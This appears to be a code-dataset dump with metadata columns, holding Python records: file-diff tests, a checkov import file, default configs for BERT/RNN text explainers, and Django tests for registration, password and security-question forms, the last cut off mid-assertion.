b'"3";-0.0106417702666228;-0.0106417702666228;-0.0106417702666228;-0.0108214718366451;-0.0106417702666228;'
b'-0.0108214718366451\n',
b'"4";-0.0106417702666228;-0.0106417702666228;-0.0106417702666228;-0.0108214718366451;-0.0106417702666228;'
b'-0.0108214718366451\n',
b'"5";-0.0106417702666228;-0.0106417702666228;-0.0106417702666228;-0.0108214718366451;-0.0106417702666228;'
b'-0.0108214718366451\n',
b'"6";-0.0106417702666228;-0.0106417702666228;-0.0106417702666228;-0.0108214718366451;-0.0106417702666228;'
b'-0.0108214718366451\n',
b'"7";-0.0106417702666228;-0.0106417702666228;-0.0106417702666228;-0.0108214718366451;-0.0106417702666228;'
b'-0.0108214718366451\n',
b'"8";-0.0106417702666228;-0.0106417702666228;-0.0106417702666228;-0.0108214718366451;-0.0106417702666228;'
b'-0.0108214718366451\n',
b'"9";-0.0106417702666228;-0.0106417702666228;-0.0106417702666228;-0.0108214718366451;-0.0106417702666228;'
b'-0.0108214718366451\n',
b'"10";-0.0106417702666228;-0.0106417702666228;-0.0106417702666228;-0.0108214718366451;-0.0106417702666228'
b';-0.0108214718366451\n']
assert lines_f2 == [
b'"16";-0.00848124395493423;-0.00866091748760897;-0.00866091748760897;-0.00902026455295847;-0.009020264552'
b'95847;-0.00902026455295847\n',
b'"17";-0.00848124395493423;-0.00866091748760897;-0.00866091748760897;-0.00902026455295847;-0.009020264552'
b'95847;-0.00902026455295847\n',
b'"18";-0.00848124395493423;-0.00866091748760897;-0.00866091748760897;-0.00902026455295847;-0.009020264552'
b'95847;-0.00902026455295847\n',
b'"19";-0.00848124395493423;-0.00866091748760897;-0.00866091748760897;-0.00902026455295847;-0.009020264552'
b'95847;-0.00902026455295847\n',
b'"20";-0.00848124395493423;-0.00866091748760897;-0.00866091748760897;-0.00902026455295847;-0.009020264552'
b'95847;-0.00902026455295847\n']
assert lines_f_both == [
b'"V1";"V2";"V3";"V4";"V5";"V6"\n',
b'"11";-0.00848124395493423;-0.00866091748760897;-0.00866091748760897;-0.00902026455295847;'
b'-0.00902026455295847;-0.00902026455295847\n',
b'"12";-0.00848124395493423;-0.00866091748760897;-0.00866091748760897;-0.00902026455295847;'
b'-0.00902026455295847;-0.00902026455295847\n',
b'"13";-0.00848124395493423;-0.00866091748760897;-0.00866091748760897;-0.00902026455295847;'
b'-0.00902026455295847;-0.00902026455295847\n',
b'"14";-0.00848124395493423;-0.00866091748760897;-0.00866091748760897;-0.00902026455295847;'
b'-0.00902026455295847;-0.00902026455295847\n',
b'"15";-0.00848124395493423;-0.00866091748760897;-0.00866091748760897;-0.00902026455295847;'
b'-0.00902026455295847;-0.00902026455295847\n']
# cleanup
outfile_p_both.unlink()
outfile_p_1.unlink()
outfile_p_2.unlink()
def test_file_diffs_performance():
# arrange
fp1 = str(Path(__file__).parent / "data" / "file_1.txt")
fp2 = str(Path(__file__).parent / "data" / "file_2.txt")
# outfile path for cleanup
outfile_p_both = Path(__file__).parent / "lines_present_in_both_files.txt"
outfile_p_1 = Path(__file__).parent / "lines_present_only_in_file1.txt"
outfile_p_2 = Path(__file__).parent / "lines_present_only_in_file2.txt"
# act
start = time()
runtime_avg = []
for i in range(0, 10000):
start_loop = time()
file_diffs(
filename_1=fp1, filename_2=fp2,
outpath_lines_present_in_both_files=str(outfile_p_both),
outpath_lines_present_only_in_file1=str(outfile_p_1),
outpath_lines_present_only_in_file2=str(outfile_p_2),
verbose=False
)
runtime_avg.append(time() - start_loop)
runtime = time() - start
# asserts
# runtime for 10,000 file diffs of two 10-line files (5 lines differing) should stay under 30 s
assert runtime < 30
# assert the average per-call runtime is at most 30/10,000 s
assert sum(runtime_avg) / len(runtime_avg) <= 30 / 10000
# cleanup
outfile_p_both.unlink()
outfile_p_1.unlink()
outfile_p_2.unlink()
# __file__ = 'filediffs/tests/test_comparefiles.py'
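# Hedged usage sketch (editorial addition): file_diffs splits two text files
# into "in both", "only in file 1" and "only in file 2" outputs. The paths
# below are placeholders, so the call is left commented out.
# file_diffs(
#     filename_1="file_1.txt", filename_2="file_2.txt",
#     outpath_lines_present_in_both_files="both.txt",
#     outpath_lines_present_only_in_file1="only_1.txt",
#     outpath_lines_present_only_in_file2="only_2.txt",
#     verbose=True,
# )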
| 43.875
| 115
| 0.690799
| 744
| 5,967
| 5.293011
| 0.159946
| 0.172676
| 0.137125
| 0.172676
| 0.805993
| 0.801168
| 0.788979
| 0.788979
| 0.788979
| 0.788979
| 0
| 0.44907
| 0.170773
| 5,967
| 135
| 116
| 44.2
| 0.346807
| 0.050109
| 0
| 0.441176
| 0
| 0.147059
| 0.50566
| 0.493102
| 0
| 0
| 0
| 0
| 0.078431
| 1
| 0.019608
| false
| 0
| 0.029412
| 0
| 0.04902
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
2d8e5b7fcc40e28403a0e1aeeb3377d9a14e55fe
| 158
|
py
|
Python
|
checkov/terraform/checks/resource/__init__.py
|
cclauss/checkov
|
60a385fcaff1499cf00c2d0018575fe5ab71f556
|
[
"Apache-2.0"
] | 1
|
2021-01-26T12:46:32.000Z
|
2021-01-26T12:46:32.000Z
|
checkov/terraform/checks/resource/__init__.py
|
cclauss/checkov
|
60a385fcaff1499cf00c2d0018575fe5ab71f556
|
[
"Apache-2.0"
] | 1
|
2021-06-02T03:40:50.000Z
|
2021-06-02T03:40:50.000Z
|
checkov/terraform/checks/resource/__init__.py
|
cclauss/checkov
|
60a385fcaff1499cf00c2d0018575fe5ab71f556
|
[
"Apache-2.0"
] | 1
|
2021-11-28T09:51:01.000Z
|
2021-11-28T09:51:01.000Z
|
from checkov.terraform.checks.resource.aws import *
from checkov.terraform.checks.resource.gcp import *
from checkov.terraform.checks.resource.azure import *
| 39.5
| 53
| 0.829114
| 21
| 158
| 6.238095
| 0.428571
| 0.251908
| 0.458015
| 0.59542
| 0.870229
| 0.610687
| 0
| 0
| 0
| 0
| 0
| 0
| 0.075949
| 158
| 3
| 54
| 52.666667
| 0.89726
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 9
|
2de7d07ad1ece8929472df554fd9223f67ebed89
| 1,975
|
py
|
Python
|
python/interpret_text/experimental/common/model_config/model_config_constants.py
|
imatiach-msft/interpret-text
|
7629b78f425459a84a40fe0acf370de5b5b27bd1
|
[
"MIT"
] | 277
|
2020-05-12T10:14:02.000Z
|
2022-03-31T07:09:06.000Z
|
python/interpret_text/experimental/common/model_config/model_config_constants.py
|
nehalecky/interpret-text
|
62a5e7406bf5c7d2df69648a278082d602e88dd6
|
[
"MIT"
] | 49
|
2020-04-30T18:15:30.000Z
|
2022-02-27T01:03:04.000Z
|
python/interpret_text/experimental/common/model_config/model_config_constants.py
|
nehalecky/interpret-text
|
62a5e7406bf5c7d2df69648a278082d602e88dd6
|
[
"MIT"
] | 48
|
2020-05-08T16:07:32.000Z
|
2022-03-06T21:34:18.000Z
|
from typing import Dict
""" Default model configuration used by BERT, RNN and BERT_RNN """
def get_bert_default_config() -> Dict:
return {
"cuda": False,
"pretrain_cls": False,
"batch_size": 32,
"num_epochs": 1,
"num_pretrain_epochs": 10,
"save_best_model": False,
"hidden_dim": 768,
"embedding_dimension": 768,
"gen_embedding_dim": 768,
"label_embedding_dim": 400,
"fixed_classifier": False,
"lambda_sparsity": 1.0,
"lambda_continuity": 0,
"lambda_anti": 1.0,
"target_sparsity": 0.3,
"training_stop_thresh": 5,
"count_pieces": 4,
"fine_tuning": True,
"bert_explainers": True,
"dropout_rate": 0.3,
"layer_num": 1,
"embedding_dim": 100,
"exploration_rate": 0.05,
"lambda_acc_gap": 1.2,
"lr": 2e-4,
"train_batch_size": 32,
"test_batch_size": 32
}
def get_rnn_default_config() -> Dict:
return {
"cuda": False,
"pretrain_cls": False,
"batch_size": 32,
"num_epochs": 1,
"num_pretrain_epochs": 10,
"save_best_model": False,
"hidden_dim": 100,
"embedding_dimension": 100,
"gen_embedding_dim": 100,
"label_embedding_dim": 400,
"fixed_classifier": False,
"lambda_sparsity": 1.0,
"lambda_continuity": 0,
"lambda_anti": 1.0,
"target_sparsity": 0.3,
"training_stop_thresh": 5,
"count_pieces": 4,
"fine_tuning": True,
"bert_explainers": False,
"dropout_rate": 0.3,
"layer_num": 1,
"embedding_dim": 100,
"exploration_rate": 0.05,
"lambda_acc_gap": 1.2,
"lr": 2e-4,
"train_batch_size": 32,
"test_batch_size": 32
}
def get_bert_rnn_default_config() -> Dict:
return {
"hidden_dim": 100,
"embedding_dimension": 768
}
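# Illustrative usage (not part of the original module): a hedged sketch showing how the partial
# BERT_RNN config could be layered over the BERT defaults. The merge step and the `config`
# variable name are assumptions for demonstration only; the module itself only defines the getters.
config = {**get_bert_default_config(), **get_bert_rnn_default_config()}
assert config["hidden_dim"] == 100 and config["embedding_dimension"] == 768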
| 26.333333
| 66
| 0.550886
| 230
| 1,975
| 4.386957
| 0.304348
| 0.053518
| 0.065411
| 0.068385
| 0.8444
| 0.765114
| 0.765114
| 0.765114
| 0.765114
| 0.765114
| 0
| 0.068098
| 0.315949
| 1,975
| 74
| 67
| 26.689189
| 0.678756
| 0
| 0
| 0.772727
| 0
| 0
| 0.396543
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.045455
| true
| 0
| 0.015152
| 0.045455
| 0.060606
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
9344cae25ee00a2c12d588eef78ebf6caf547cf0
| 44,468
|
py
|
Python
|
authentication_service/tests/test_forms.py
|
hedleyroos/core-authentication-service
|
4a59430cddf23c58322230dd1fe70998fcc46736
|
[
"BSD-3-Clause"
] | 1
|
2018-03-15T12:49:05.000Z
|
2018-03-15T12:49:05.000Z
|
authentication_service/tests/test_forms.py
|
hedleyroos/core-authentication-service
|
4a59430cddf23c58322230dd1fe70998fcc46736
|
[
"BSD-3-Clause"
] | 215
|
2017-12-07T09:11:52.000Z
|
2022-03-11T23:19:59.000Z
|
authentication_service/tests/test_forms.py
|
hedleyroos/core-authentication-service
|
4a59430cddf23c58322230dd1fe70998fcc46736
|
[
"BSD-3-Clause"
] | 1
|
2021-08-17T12:05:32.000Z
|
2021-08-17T12:05:32.000Z
|
from dateutil.relativedelta import relativedelta
import datetime
from unittest import mock
from django.contrib.auth import get_user_model
from django.forms import model_to_dict
from django.test import TestCase, override_settings
from authentication_service.forms import (
RegistrationForm, SecurityQuestionFormSet,
EditProfileForm, SetPasswordForm, PasswordChangeForm
)
from authentication_service import constants
from authentication_service.models import SecurityQuestion, Organisation
from authentication_service.user_migration.forms import (
UserDataForm
)
@override_settings(
HIDE_FIELDS={"global_enable": False,
"global_fields": ["email", "msisdn", "birth_date"]}
)
class TestRegistrationForm(TestCase):
maxDiff = None
def test_default_state(self):
form = RegistrationForm(data={})
self.assertFalse(form.is_valid())
self.assertEqual(form.errors, {
"username": ["This field is required."],
"password1": ["This field is required."],
"password2": ["This field is required."],
"terms": ["This field is required."],
"__all__": ["Enter either email or msisdn", "Enter either birth date or age"]
})
def test_default_password_validation(self):
# Test both required
form = RegistrationForm(data={
"username": "Username",
"email": "email@email.com",
"birth_date": datetime.date(2000, 1, 1),
"password1": "password",
"terms": True,
})
self.assertFalse(form.is_valid())
self.assertEqual(form.errors, {
"password2": ["This field is required."],
})
# Test both must match
form = RegistrationForm(data={
"username": "Username",
"email": "email@email.com",
"birth_date": datetime.date(2000, 1, 1),
"terms": True,
"password1": "password",
"password2": "password2"
})
self.assertFalse(form.is_valid())
self.assertEqual(form.errors, {
"password2": ["The two password fields don't match. Please try again."],
})
# Test min length
form = RegistrationForm(data={
"username": "Username",
"email": "email@email.com",
"birth_date": datetime.date(2000, 1, 1),
"terms": True,
"password1": "123",
"password2": "123"
})
self.assertFalse(form.is_valid())
self.assertEqual(form.errors, {
"password2": ["Password not long enough."],
})
# Test passwords happy
form = RegistrationForm(data={
"username": "Username",
"email": "email@email.com",
"birth_date": datetime.date(2000, 1, 1),
"terms": True,
"password1": "1234",
"password2": "1234"
})
self.assertTrue(form.is_valid())
form.clean() # We need to clean the form to ensure birth_date is set appropriately
def test_default_email_msisdn(self):
# Test either is required
form = RegistrationForm(data={
"username": "Username",
"password1": "password",
"password2": "password",
"terms": True,
"birth_date": datetime.date(2000, 1, 1)
})
self.assertFalse(form.is_valid())
self.assertEqual(form.errors, {
"__all__": ["Enter either email or msisdn"]
})
# Test valid with email
form = RegistrationForm(data={
"username": "Username",
"password1": "password",
"password2": "password",
"email": "email@email.com",
"terms": True,
"birth_date": datetime.date(2000, 1, 1)
})
self.assertTrue(form.is_valid())
# Test valid with msisdn
form = RegistrationForm(data={
"username": "Username",
"password1": "password",
"password2": "password",
"msisdn": "0856545698",
"terms": True,
"birth_date": datetime.date(2000, 1, 1)
})
self.assertTrue(form.is_valid())
# Test valid with both
form = RegistrationForm(data={
"username": "Username",
"password1": "password",
"password2": "password",
"email": "email@email.com",
"msisdn": "0856545698",
"terms": True,
"birth_date": datetime.date(2000, 1, 1)
})
self.assertTrue(form.is_valid())
def test_default_required_toggle(self):
required = [
"username", "first_name", "last_name", "email",
"nickname", "msisdn", "gender", "birth_date", "country", "avatar"
]
form = RegistrationForm(data={}, required=required)
self.assertFalse(form.is_valid())
self.assertEqual(form.errors, {
"username": ["This field is required."],
"first_name": ["This field is required."],
"last_name": ["This field is required."],
"email": ["This field is required."],
"nickname": ["This field is required."],
"msisdn": ["This field is required."],
"gender": ["This field is required."],
"country": ["This field is required."],
"avatar": ["This field is required."],
"password1": ["This field is required."],
"password2": ["This field is required."],
"terms": ["This field is required."],
"__all__": ["Enter either email or msisdn", "Enter either birth date or age"]
})
def test_default_required_toggle_mapping(self):
required = [
"names", "picture"
]
form = RegistrationForm(data={}, required=required)
self.assertFalse(form.is_valid())
self.assertEqual(form.errors, {
"username": ["This field is required."],
"first_name": ["This field is required."],
"last_name": ["This field is required."],
"nickname": ["This field is required."],
"avatar": ["This field is required."],
"password1": ["This field is required."],
"password2": ["This field is required."],
"terms": ["This field is required."],
"__all__": ["Enter either email or msisdn", "Enter either birth date or age"]
})
def test_high_security_default_state(self):
form = RegistrationForm(data={}, security="high")
self.assertFalse(form.is_valid())
self.assertEqual(form.errors, {
"username": ["This field is required."],
"email": ["This field is required."],
"password1": ["This field is required."],
"password2": ["This field is required."],
"terms": ["This field is required."],
"__all__": ["Enter either email or msisdn", "Enter either birth date or age"]
})
def test_high_security_password_validation(self):
# Test both required
form = RegistrationForm(data={
"username": "Username",
"birth_date": datetime.date(2000, 1, 1),
"email": "email@email.com",
"password1": "password",
"terms": True,
},
security="high")
self.assertFalse(form.is_valid())
self.assertEqual(form.errors, {
"password2": ["This field is required."],
})
# Test both must match
form = RegistrationForm(data={
"username": "Username",
"email": "email@email.com",
"birth_date": datetime.date(2000, 1, 1),
"terms": True,
"password1": "password",
"password2": "password2"
},
security="high")
self.assertFalse(form.is_valid())
self.assertEqual(form.errors, {
"password2": ["The two password fields don't match. Please try again."],
})
# Test min length, unique validation and contains more than numeric
form = RegistrationForm(data={
"username": "Username",
"email": "email@email.com",
"birth_date": datetime.date(2001, 1, 1),
"terms": True,
"password1": "123",
"password2": "123"
},
security="high")
self.assertFalse(form.is_valid())
self.assertEqual(form.errors, {
"password2": [
"This password is too short. It must contain at least 8 characters.",
"This password is entirely numeric.",
"The password must contain at least one uppercase letter, "
"one lowercase one, a digit and special character."
]
})
# Test unique validation
form = RegistrationForm(data={
"username": "Username",
"email": "email@email.com",
"birth_date": datetime.date(2000, 1, 1),
"terms": True,
"password1": "asdasdasd",
"password2": "asdasdasd"
},
security="high")
self.assertFalse(form.is_valid())
self.assertEqual(form.errors, {
"password2": [
"The password must contain at least one uppercase letter, "
"one lowercase one, a digit and special character."
]
})
# Test close to username
form = RegistrationForm(data={
"username": "asdasd",
"email": "email@email.com",
"birth_date": datetime.date(2000, 1, 1),
"terms": True,
"password1": "asdasdasd",
"password2": "asdasdasd"
},
security="high")
self.assertFalse(form.is_valid())
self.assertEqual(form.errors, {
"password2": [
"The password is too similar to the username.",
"The password must contain at least one uppercase letter, "
"one lowercase one, a digit and special character."
]
})
# Test success
form = RegistrationForm(data={
"username": "Username",
"email": "email@email.com",
"birth_date": datetime.date(2001, 1, 1),
"terms": True,
"password1": "asdasdasdA@1",
"password2": "asdasdasdA@1"
},
security="high")
self.assertTrue(form.is_valid())
def test_age_to_birth_date(self):
# Test age specified instead of birth_date. Refer to the link below for an explanation of
# why the mocking is done the way it is:
# http://www.voidspace.org.uk/python/mock/examples.html#partial-mocking
with mock.patch("authentication_service.forms.date") as mocked_date:
mocked_date.today.return_value = datetime.date(2000, 1, 2)
mocked_date.side_effect = lambda *args, **kw: datetime.date(*args, **kw)
form = RegistrationForm(
data={
"username": "Username",
"email": "email@email.com",
"age": "16",
"terms": True,
"password1": "asdasdasdA@1",
"password2": "asdasdasdA@1"
},
security="high"
)
self.assertTrue(form.is_valid())
self.assertEqual(form.cleaned_data["birth_date"], datetime.date(1984, 1, 2))
def test_high_security_required_toggle(self):
required = [
"username", "first_name", "last_name", "email",
"nickname", "msisdn", "gender", "birth_date", "country", "avatar"
]
form = RegistrationForm(data={}, security="high", required=required)
self.assertFalse(form.is_valid())
self.assertEqual(form.errors, {
"username": ["This field is required."],
"first_name": ["This field is required."],
"last_name": ["This field is required."],
"email": ["This field is required."],
"nickname": ["This field is required."],
"msisdn": ["This field is required."],
"gender": ["This field is required."],
"country": ["This field is required."],
"avatar": ["This field is required."],
"password1": ["This field is required."],
"password2": ["This field is required."],
"terms": ["This field is required."],
"__all__": ["Enter either email or msisdn", "Enter either birth date or age"]
})
def test_email_validation(self):
user = get_user_model().objects.create_user(
username="awesomeuser",
email="awesome@email.com",
password="Awesome!234",
birth_date=datetime.date(2001, 1, 1)
)
user.save()
form = RegistrationForm(data={
"username": "Username",
"email": "awesome@email.com",
"birth_date": datetime.date(2000, 1, 1),
"terms": True,
"password1": "password",
"password2": "password",
})
self.assertFalse(form.is_valid())
self.assertEqual(form.errors, {
"email": ["Core user with this Email address already exists."],
})
# Test users without emails do not cause validation errors.
user = get_user_model().objects.create_user(
username="awesomeuser2",
password="Awesome!234",
birth_date=datetime.date(2001, 1, 1)
)
user.save()
form = RegistrationForm(data={
"username": "Username",
"password1": "password",
"password2": "password",
"msisdn": "0856545698",
"terms": True,
"birth_date": datetime.date(2000, 1, 1)
})
self.assertTrue(form.is_valid())
form = RegistrationForm(data={
"username": "Username2",
"password1": "password",
"password2": "password",
"msisdn": "0856545698",
"terms": True,
"birth_date": datetime.date(2000, 1, 1)
})
self.assertTrue(form.is_valid())
def test_min_required_age_dob(self):
form = RegistrationForm(data={
"username": "Username",
"email": "email@email.com",
"birth_date": datetime.date.today() - relativedelta(years=10),
"terms": True,
"password1": "asdasdasdA@1",
"password2": "asdasdasdA@1"
})
self.assertFalse(form.is_valid())
def test_min_required_age(self):
form = RegistrationForm(data={
"username": "Username",
"email": "email@email.com",
"age": constants.CONSENT_AGE-1,
"terms": True,
"password1": "asdasdasdA@1",
"password2": "asdasdasdA@1"
})
self.assertFalse(form.is_valid())
self.assertEqual(form.errors, {
"age": [
"We are sorry, " \
f"users under the age of {constants.CONSENT_AGE}" \
" cannot create an account."
]
})
with mock.patch("authentication_service.forms.date") as mocked_date:
mocked_date.today.return_value = datetime.date(2018, 1, 2)
mocked_date.side_effect = lambda *args, **kw: datetime.date(*args, **kw)
form = RegistrationForm(data={
"username": "Username",
"email": "email@email.com",
"birth_date": datetime.date(2018-constants.CONSENT_AGE, 1, 3),
"terms": True,
"password1": "asdasdasdA@1",
"password2": "asdasdasdA@1"
})
self.assertFalse(form.is_valid())
form = RegistrationForm(data={
"username": "Username",
"email": "email@email.com",
"birth_date": datetime.date(2018-constants.CONSENT_AGE+1, 1, 3),
"terms": True,
"password1": "asdasdasdA@1",
"password2": "asdasdasdA@1"
})
self.assertFalse(form.is_valid())
def test_on_required_age(self):
form = RegistrationForm(data={
"username": "Username",
"email": "email@email.com",
"age": constants.CONSENT_AGE,
"terms": True,
"password1": "asdasdasdA@1",
"password2": "asdasdasdA@1"
})
self.assertTrue(form.is_valid())
with mock.patch("authentication_service.forms.date") as mocked_date:
mocked_date.today.return_value = datetime.date(2018, 1, 2)
mocked_date.side_effect = lambda *args, **kw: datetime.date(*args, **kw)
form = RegistrationForm(data={
"username": "Username",
"email": "email@email.com",
"birth_date": datetime.date(2018-constants.CONSENT_AGE, 1, 2),
"terms": True,
"password1": "asdasdasdA@1",
"password2": "asdasdasdA@1"
})
self.assertTrue(form.is_valid())
def test_unique_username(self):
user = get_user_model().objects.create_user(
username="testuser",
birth_date=datetime.date(2000, 1, 1),
email="wrong@email.com",
gender="female",
email_verified=True
)
form = RegistrationForm(data={
"username": user.username,
"email": "email@email.com",
"age": constants.CONSENT_AGE,
"terms": True,
"password1": "asdasdasdA@1",
"password2": "asdasdasdA@1"
})
self.assertFalse(form.is_valid())
self.assertEqual(form.errors, {
"username": [
"Oh no! Looks like somebody else already took your username. "
"Please try something else, you get to choose an even cooler one this time!"
],
})
class TestRegistrationFormHTML(TestCase):
maxDiff = None
def test_default_state(self):
form = RegistrationForm(data={})
self.assertFalse(form.is_valid())
# TODO Update once end user has new copy
self.assertNotIn("<li>Your password can't be too similar to your " \
"other personal information.</li><li>Your password must contain at " \
"least 8 characters.</li><li>Your password can't be a commonly " \
"used password.</li><li>Your password can't be entirely numeric." \
"</li><li>The password must contain at least one uppercase letter, " \
"one lowercase one, a digit and special character.</li>", form.as_div())
def test_high_security_state(self):
form = RegistrationForm(data={}, security="high")
self.assertFalse(form.is_valid())
self.assertIn("<li>Your password can't be too similar to your " \
"other personal information.</li><li>Your password must contain at " \
"least 8 characters.</li><li>Your password can't be a commonly " \
"used password.</li><li>Your password can't be entirely numeric." \
"</li><li>The password must contain at least one uppercase letter, " \
"one lowercase one, a digit and special character.</li>", form.as_div())
class TestRegistrationFormWithHideSetting(TestCase):
maxDiff = None
def test_default_state(self):
form = RegistrationForm(data={})
self.assertFalse(form.is_valid())
self.assertEqual(form.errors, {
"username": ["This field is required."],
"password1": ["This field is required."],
"password2": ["This field is required."],
"gender": ["This field is required."],
"age": ["This field is required."],
"terms": ["This field is required."],
})
def test_default_settings(self):
form = RegistrationForm(data={
"username": "Username",
"password1": "password",
"password2": "password",
"gender": "none",
"age": "16",
"terms": True,
})
self.assertTrue(form.is_valid())
form = RegistrationForm(data={
"username": "Username",
"password1": "password",
"password2": "password",
"gender": "female",
"age": "16",
"terms": True,
})
self.assertTrue(form.is_valid())
# Test valid with email
form = RegistrationForm(data={
"username": "Username",
"password1": "password",
"password2": "password",
"email": "email@email.com",
"gender": "female",
"age": "16",
"terms": True,
})
self.assertTrue(form.is_valid())
# Test valid with msisdn
form = RegistrationForm(data={
"username": "Username",
"password1": "password",
"password2": "password",
"msisdn": "0856545698",
"gender": "female",
"age": "16",
"terms": True,
})
self.assertTrue(form.is_valid())
# Test valid with both
form = RegistrationForm(data={
"username": "Username",
"password1": "password",
"password2": "password",
"email": "email@email.com",
"msisdn": "0856545698",
"birth_date": datetime.date(2000, 1, 1),
"gender": "female",
"age": "16",
"terms": True,
})
self.assertTrue(form.is_valid())
class TestSecurityQuestionFormSet(TestCase):
maxDiff = None
@classmethod
def setUpTestData(cls):
super(TestSecurityQuestionFormSet, cls).setUpTestData()
# Security questions
cls.question_one = SecurityQuestion.objects.create(
question_text="Some text for the one question"
)
cls.question_two = SecurityQuestion.objects.create(
question_text="Some text for the other question"
)
def test_default_state(self):
data = {
"form-TOTAL_FORMS": "2",
"form-INITIAL_FORMS": "0",
"form-MIN_NUM_FORMS": "0",
"form-MAX_NUM_FORMS": "1000",
"form-0-question": "",
"form-0-answer": "",
"form-1-question": "",
"form-1-answer": ""
}
formset = SecurityQuestionFormSet(data=data, language="en")
self.assertFalse(formset.is_valid())
self.assertEqual(formset.non_form_errors(),
["Please fill in all Security Question fields."]
)
def test_validation(self):
# Ensure that all questions need to be answered when email is not
# present.
data = {
"form-TOTAL_FORMS": "2",
"form-INITIAL_FORMS": "0",
"form-MIN_NUM_FORMS": "0",
"form-MAX_NUM_FORMS": "1000",
"form-0-question": "",
"form-0-answer": "",
"form-1-question": "",
"form-1-answer": ""
}
formset = SecurityQuestionFormSet(data=data, language="en")
self.assertFalse(formset.is_valid())
self.assertEqual(
formset.non_form_errors(),
["Please fill in all Security Question fields."]
)
# Ensure its valid if email is present
data = {
"email": "email@email.com",
"form-TOTAL_FORMS": "2",
"form-INITIAL_FORMS": "0",
"form-MIN_NUM_FORMS": "0",
"form-MAX_NUM_FORMS": "1000",
"form-0-question": "",
"form-0-answer": "",
"form-1-question": "",
"form-1-answer": ""
}
formset = SecurityQuestionFormSet(data=data, language="en")
self.assertTrue(formset.is_valid())
# Ensure that all questions need to be answered. If anything was filled
# in on the questions.
data = {
"email": "email@email.com",
"form-TOTAL_FORMS": "2",
"form-INITIAL_FORMS": "0",
"form-MIN_NUM_FORMS": "0",
"form-MAX_NUM_FORMS": "1000",
"form-0-question": self.question_one.id,
"form-0-answer": "",
"form-1-question": "",
"form-1-answer": ""
}
formset = SecurityQuestionFormSet(data=data, language="en")
self.assertFalse(formset.is_valid())
self.assertEqual(formset.non_form_errors(),
["Please fill in all Security Question fields."]
)
data = {
"email": "email@email.com",
"form-TOTAL_FORMS": "2",
"form-INITIAL_FORMS": "0",
"form-MIN_NUM_FORMS": "0",
"form-MAX_NUM_FORMS": "1000",
"form-0-question": "",
"form-0-answer": "",
"form-1-question": self.question_two.id,
"form-1-answer": ""
}
formset = SecurityQuestionFormSet(data=data, language="en")
self.assertFalse(formset.is_valid())
self.assertEqual(formset.non_form_errors(),
["Please fill in all Security Question fields."]
)
# Test answer validation
data = {
"email": "email@email.com",
"form-TOTAL_FORMS": "2",
"form-INITIAL_FORMS": "0",
"form-MIN_NUM_FORMS": "0",
"form-MAX_NUM_FORMS": "1000",
"form-0-question": self.question_one.id,
"form-0-answer": "",
"form-1-question": self.question_two.id,
"form-1-answer": ""
}
formset = SecurityQuestionFormSet(data=data, language="en")
self.assertFalse(formset.is_valid())
self.assertEqual(
formset.errors, [
{"answer": ["Don’t forget to answer your question!"]},
{"answer": ["Don’t forget to answer your question!"]}
]
)
# Test same questions can't be selected more than once.
data = {
"email": "",
"form-TOTAL_FORMS": "2",
"form-INITIAL_FORMS": "0",
"form-MIN_NUM_FORMS": "0",
"form-MAX_NUM_FORMS": "1000",
"form-0-question": self.question_one.id,
"form-0-answer": "Answer1",
"form-1-question": self.question_one.id,
"form-1-answer": "Answer2"
}
formset = SecurityQuestionFormSet(data=data, language="en")
self.assertFalse(formset.is_valid())
self.assertEqual(
formset.non_form_errors(),
["Oops! You’ve already chosen this question. Please choose a different one."]
)
# Test valid with email.
data = {
"email": "email@email.com",
"form-TOTAL_FORMS": "2",
"form-INITIAL_FORMS": "0",
"form-MIN_NUM_FORMS": "0",
"form-MAX_NUM_FORMS": "1000",
"form-0-question": self.question_one.id,
"form-0-answer": "Answer1",
"form-1-question": self.question_two.id,
"form-1-answer": "Answer2"
}
formset = SecurityQuestionFormSet(data=data, language="en")
self.assertTrue(formset.is_valid())
# Test valid without email.
data = {
"email": "",
"form-TOTAL_FORMS": "2",
"form-INITIAL_FORMS": "0",
"form-MIN_NUM_FORMS": "0",
"form-MAX_NUM_FORMS": "1000",
"form-0-question": self.question_one.id,
"form-0-answer": "Answer1",
"form-1-question": self.question_two.id,
"form-1-answer": "Answer2"
}
formset = SecurityQuestionFormSet(data=data, language="en")
self.assertTrue(formset.is_valid())
class EditProfileFormTestCase(TestCase):
maxDiff = None
@classmethod
def setUpTestData(cls):
cls.user = get_user_model().objects.create_user(
username="testuser",
birth_date=datetime.date(2000, 1, 1),
email="wrong@email.com",
gender="female",
email_verified=True
)
cls.user.save()
def test_default_state(self):
form = EditProfileForm(instance=self.user)
initial_dict = {
"email": "wrong@email.com"
}
# Check initial values
self.assertTrue(
set(initial_dict.items()).issubset(set(form.initial.items())))
def test_update_profile(self):
data = {
"email": "right@email.com",
"msisdn": "+27821234567",
"age": 34,
"gender": "female"
}
form = EditProfileForm(instance=self.user, data=data)
self.assertTrue(form.has_changed())
self.assertTrue(form.is_valid())
form.save()
user = get_user_model().objects.get(username=self.user.username)
self.assertNotEqual(datetime.date(2000, 1, 1), user.birth_date)
self.assertEqual(data["email"], user.email)
self.assertEqual(data["msisdn"], user.msisdn)
def test_nothing_updated(self):
data = model_to_dict(self.user)
form = EditProfileForm(instance=self.user, data=data)
self.assertFalse(form.has_changed())
self.assertTrue(form.is_valid())
def test_invalid_form(self):
data = {
"email": "not_an_email",
"gender": "no",
"country": "abc"
}
form = EditProfileForm(instance=self.user, data=data)
self.assertFalse(form.is_valid())
self.assertEqual(
form.errors, {
